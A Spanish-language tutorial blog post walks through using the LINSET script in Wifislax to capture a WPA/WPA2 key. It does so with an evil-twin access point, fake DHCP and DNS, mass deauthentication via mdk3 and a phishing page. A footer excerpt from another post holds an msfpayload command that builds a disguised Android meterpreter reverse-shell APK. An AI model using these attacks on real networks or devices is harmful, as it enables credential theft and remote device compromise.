Ir al contenido principal

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset




Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET.

LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente.

1. Escanea la red.
2. Selecciona la red.
3. Busca handshake (se puede usar sin handshake)
4. Se elige una de las varias interfaces web en diferentes idiomas
5. Se monta un AP Falso imitando al original
6. Se crea un servidor DHCP sobre el AP Falso
7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante)
8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4)
9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir
10. Se desautentifica a todos los usarios de la red, esperando que se conecten al AP Falso y tengan que "introducir su contraseña por motivos de seguridad".
11. Se detiene el ataque tras la comprobación correcta de la contraseña.


RECORDAR QUE ESTAS PRACTICAS SON PARA REALIZARLAS EN VUESTRAS PROPIAS REDES INALÁMBRICAS, EN NINGÚN CASO DEBE REALIZARSE EN UNA RED AJENA, ESTARÍAMOS COMETIENDO UN DELITO 

Comencemos! para acceder a LINSET seguir la siguiente ruta INICIO/WIFISLAX/WPA/LINSET


Se nos abrirá el script y comprobara la versión, en caso de no estar actualizado procederá automáticamente a actualizar el script



En el paso numero dos seleccionamos la interfaz que vamos a utilizar en este caso wlan0



Ahora escogemos si queremos escanear un canal en concreto o todos los canales, en mi caso escogí la opcion 1.


Se iniciara la búsqueda de redes disponibles, para parar la búsqueda CRTL+C .

Una vez detenida la búsqueda, deberemos escoger que red vamos a "atacar" en este caso Mi red es la red Nº2 .


Ahora nos pedirá escoger el modo en el cual funcionara nuestro AP Falso , escogemos Hostpad, el airbase-ng se utiliza para algunos chipset que no funcionan bien con el hostpad



Acto seguido el script nos preguntara si queremos utilizar un handshake previamente capturado, en este caso como no lo tenemos pulsamos enter para continuar.


Ahora debemos escoger el tipo de comprobación del handshake, yo siempre utilizo aircrack-ng, de momento no he tenido ningún problema


Después de seleccionar el tipo de comprobación de handhsake procederemos a escoger la forma de desautenticar a los clientes para poder obtener el handshake podemos escoger desautenticacion masiva / mdk3 o desautenticacion  especifica, cuantos mas clientes mas posibilidades de obtener el handshake así que seleccionaremos la primera opción.



Ahora el script procederá a desautenticar a los clientes de la red seleccionada anteriormente, esperando a la re-conexion de los mismos para obtener el handshake, aunque en la ventana de LINSET aparezca "Sin Handshake" debéis fijaros en la ventana de la derecha arriba, donde indica que si se ha capturado el handshake, para detener la busqueda del handshake pulsamos CRTL+C, y seleccionamos la opción numero 1.


LINSET como habéis leído utiliza una inferaz WEB para solicitar amablemente las credenciales de la red, seleccionamos la primera opción

en este paso escogeremos en que idioma se mostrara la web, en mi caso selecciono la opción numero 2.


Ahora comienza el "ataque" podéis observar que se abren una serie de ventanas con diferentes utilidades, el servidor DHCP, el FakeDNS y el mdk3 que cada 3 segundos desautentica clientes de la red original para obligarlos a conectarse a la red creada por LINSET


Para hacer completo el tutorial introduje mi teléfono en la red duplicada y podemos observar como se le asigna una direccion IP y como redirige todo el trafico hacia la pagina web que nos pedirá la clave de la red.


Aquí podemos observar como aparecen las dos redes, la red original y el falso AP con el mismo nombre, como podéis ver el servidor DHCP me esta dando una direccion IP.

Una vez estamos dentro de la red del falso AP intentamos navegar hacia cualquier dirección WEB, y es cuando el ataque esta a punto de finalizar, aquí podéis observar que la interfaz esta muy lograda, así que "por razones de seguridad procedemos a introducir nuestra clave WPA".


Finalmente, si la clave es correcta la "víctima del ataque" visualizara esto

Mientras nosotros, visualizaremos lo siguiente.


Aquí finaliza el ataque, en caso de que la clave introducida sea correcta, el propio script al terminar se cierra, mostrando solo la captura anterior, con la comprobacion de la clave.

Espero que os hay gustado y sido de gran utilidad.

Pronto volveré a la actividad con mas artículos relacionados con la seguridad informática y seguridad de redes inalámbricas.

Si tenéis alguna duda o alguna pregunta dejarla en comentarios!


Entradas populares de este blog

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET

Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android. El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android). Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload. Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nu

Wifislax 4.9 - I Conseguir acceso a redes WiFi protegidas con WPA/WPA2-PSK AirCrack

En esta practica se ha usado la ultima versión de Wifislax la 4.9  la podéis descargar AQUÍ  , también han sido necesarios un pendrive para acceder al live CD y una Antena Alfa Network AWUS036H Para los que empezáis de cero, necesitaremos una ISO de WIfislax  un dispositivo de almacenamiento USB y ganas de probar la seguridad de nuestra red WiFi...  Comenzamos!  creamos desde un sistema Windows el live CD de Wifislax con Yumi. Ejecutamos Yumi y seleccionamos la distribución o sistema para hacerla booteable desde el pendrive, acto seguido selecionamos la ISO de Wifislax y le damos a crear, podemos escoger los parámetros, como formatear el pendrive antes de crear el arranque y demás. Para arrancar desde el un dispositivo de almacenamiento USB es necesario que nuestra placa base soporte el arranque desde USB, en mi caso con habilitarlo desde la bios y pulsar F12 en el arranque ya me permite bootear un sistema de almacenamiento USB,al arrancar el pendrive nos aparecerá el menú